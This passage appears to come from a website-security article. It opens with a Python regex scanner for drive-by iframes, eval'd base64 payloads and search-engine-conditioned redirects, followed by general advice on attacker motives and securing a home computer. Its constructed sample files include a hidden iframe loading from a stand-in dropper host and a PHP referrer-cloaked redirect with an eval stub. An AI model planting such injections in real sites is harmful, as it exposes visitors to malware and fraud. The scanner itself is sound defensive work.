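    ("drive-by", "hidden iframe (zero-sized or pushed off screen)",
     r'<iframe[^>]*(?:width=["\']?0\b|height=["\']?0\b|visibility:\s*hidden'
     r'|display:\s*none|left:\s*-\d{3,})[^>]*>'),
    ("drive-by", "eval() of a decoded payload",
     r'eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\('),
    ("drive-by", "long base64 blob passed to base64_decode",
     r'base64_decode\s*\(\s*["\'][A-Za-z0-9+/=]{80,}["\']'),
    ("seo-redirect", "redirect conditioned on a search-engine referrer",
     r'HTTP_REFERER[^;]{0,120}(?:google|bing|yahoo)[\s\S]{0,200}?header\s*\(\s*["\']Location:'),
    ("seo-redirect", "content cloaked for a search-engine crawler user-agent",
     r'HTTP_USER_AGENT[^;]{0,120}(?:googlebot|bingbot)'),
    ("seo-redirect", "JavaScript redirect conditioned on document.referrer",
     r'document\.referrer[\s\S]{0,200}?(?:window\.|top\.)?location(?:\.href)?\s*=\s*["\']https?://'),
]


def scan_text(name: str, text: str) -> List[Dict[str, object]]:
    """Return one hit per rule match, with the 1-based line number where it starts."""
    hits: List[Dict[str, object]] = []
    for category, description, pattern in RULES:
        for match in re.finditer(pattern, text, re.IGNORECASE):
            hits.append({
                "file": name,
                "line": text.count("\n", 0, match.start()) + 1,
                "category": category,
                "description": description,
                "snippet": match.group(0)[:60],
            })
    return sorted(hits, key=lambda h: (str(h["file"]), int(h["line"])))


def scan_site(files: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan an in-memory map of relative path -> file contents (use os.walk for a real tree)."""
    hits: List[Dict[str, object]] = []
    for name, text in files.items():
        hits.extend(scan_text(name, text))
    return hits


# Constructed sample files: one clean template, one with a hidden iframe, one with
# an SEO redirect and an obfuscated payload stuffed into a theme helper.
SAMPLE_FILES: Dict[str, str] = {
    "index.php": (
        "<?php get_header(); ?>\n"
        "<main>\n"
        '  <iframe width="560" height="315" src="https://www.youtube.com/embed/VIDEO_ID"></iframe>\n'
        "</main>\n"
        "<?php get_footer(); ?>\n"
    ),
    "footer.php": (
        "    <footer>&copy; Example Co.</footer>\n"
        '    <iframe src="http://dropper.example/load.php" width="0" height="0" '
        'style="visibility:hidden"></iframe>\n'
        "  </body>\n</html>\n"
    ),
    "functions.php": (
        "<?php\n"
        "// theme helper (constructed sample with injected code below)\n"
        "if (isset($_SERVER['HTTP_REFERER']) && preg_match('/google|bing|yahoo/i', "
        "$_SERVER['HTTP_REFERER'])) {\n"
        "    header('Location: http://affiliate.example/landing');\n"
        "    exit;\n"
        "}\n"
        "eval(base64_decode('" + "A" * 100 + "'));\n"
    ),
}

if __name__ == "__main__":
    for hit in scan_site(SAMPLE_FILES):
        print(f"{hit['file']}:{hit['line']} [{hit['category']}] {hit['description']}")
```

The referrer and user-agent rules are what make the SEO case hard to notice: the redirect only fires for visitors arriving from a search engine, so the owner browsing their own site directly never sees it. Pair a scanner like this with a clean copy of your theme and plugins (a diff against the vendor release is far more reliable than any regex) and treat hits in core or vendor files as confirmation that you need a restore, not just a cleanup.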

System Resources

Farming system resources is a huge motivator for hacking groups. A botnet is nothing more than a set of compromised systems tethered together across the internet, whether desktops, tablets or even servers, commanded to perform tasks such as Denial of Service attacks simultaneously. Attacks that target your system resources are dangerous because they can run completely behind the scenes, with no sign that anything is wrong until you get a notice from your host, or worse, a huge bill, for exceeding your bandwidth.

Hacktivism

These attacks usually come down to raising awareness, and most often consist of defacing your homepage. Defacement can be combined with other attacks, but more often than not it is relatively benign and embarrasses the site owner more than it harms site visitors.

Pure Boredom

Unfortunately boredom also plays a part, and often there is no real reason why a particular website was hacked.

Conclusion – Your Best Defense is Knowledge

It is easy to be overwhelmed by all of this, but we believe that your best defense is knowledge. If there is one real take-away here, it is that you should

  1. hire someone to manage and maintain your website
  2. update whenever updates are available

Remember, security is not about the elimination of risk. Security is risk reduction. Take what you know and use it to lower your chances of getting hacked.

Four Tips for Securing Your Computer

Unfortunately the #1 cause of virus and malware infections is the user, and that means you. If it were possible to take the user out of the equation, computers would be much more secure. Obviously that's not practical, so I'm going to offer you four relatively easy tips for securing your computer.

How to Secure Your Computer

Run the computer as a limited user account.

A limited (standard) account cannot install software or change system settings without an administrator's password, so malware that runs as you is limited too. Never do your day-to-day work as an administrator. If you are, go to the Control Panel, create a new user with limited permissions, and use that account for everyday work. For parents, you can create a limited account for your child and then set up parental controls on it to limit the hours they can use the computer, the games they can access, and the programs they can run. For more information about setting up parental controls in Windows 7 or Windows 8

Install updates and patches as soon as they are available.

Patches and updates are absolutely critical. Almost all of them are security related: the company issuing the update is essentially saying, "We've found a security hole and need you to install this so the bad guys can't get at your private information." Just last week, Apple was in the news for a flaw that allowed what's called a man-in-the-middle attack, making operations you think are secure (online banking, for example) insecure. The reason to update as soon as an update is available is that attackers immediately target users who haven't installed it yet; once a patch is public, so is the hole it fixes. Make sure you always have automatic updates turned on.

Use a router in between your computer and your cable modem.

A router is an additional line of defense: it sits between your computer and the internet, so unsolicited connections from outside hit the router rather than your machine. Make sure its security settings (the firewall in particular) are turned on. Visit GRC.com and run the ShieldsUP! test; it probes your network from the outside and reports which ports are exposed to attack.

You are the final line of defense.

Each user must be the final line of defense. Avoid clicking unknown links, opening unexpected attachments, and visiting untrusted sites.